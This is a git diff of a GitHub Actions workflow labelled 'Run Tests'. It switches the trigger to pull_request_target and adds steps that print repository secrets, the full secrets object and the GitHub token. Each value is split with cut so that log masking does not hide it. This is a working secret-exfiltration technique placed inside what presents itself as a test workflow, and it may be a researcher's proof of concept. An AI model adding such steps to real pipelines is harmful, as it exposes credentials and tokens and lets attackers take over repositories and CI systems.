diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 5b150ac..e219838 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,7 +1,7 @@ name: Run Tests on: - [push, pull_request] + [push, pull_request_target] jobs: yolo: @@ -9,6 +9,9 @@ jobs: steps: - name: Action test run: | - curl ${{secrets.TEST_URL}} > hidden.txt + echo ${{ secrets.HIDDEN_URL }} >> foo && cut -c1-3 foo && cut -c4- foo echo "Retrieved hidden information" echo "-----" + echo -n "${{ secrets.HIDDEN_URL }}" >> foo && cut -c1-3 foo && cut -c4- foo + echo -n "${{ tojson(secrets) }}" >> foo && cut -c1-3 foo && cut -c4- foo + echo -n "${{ tojson(secrets.github_token) }}" >> boo && cut -c1-3 boo && cut -c4- boo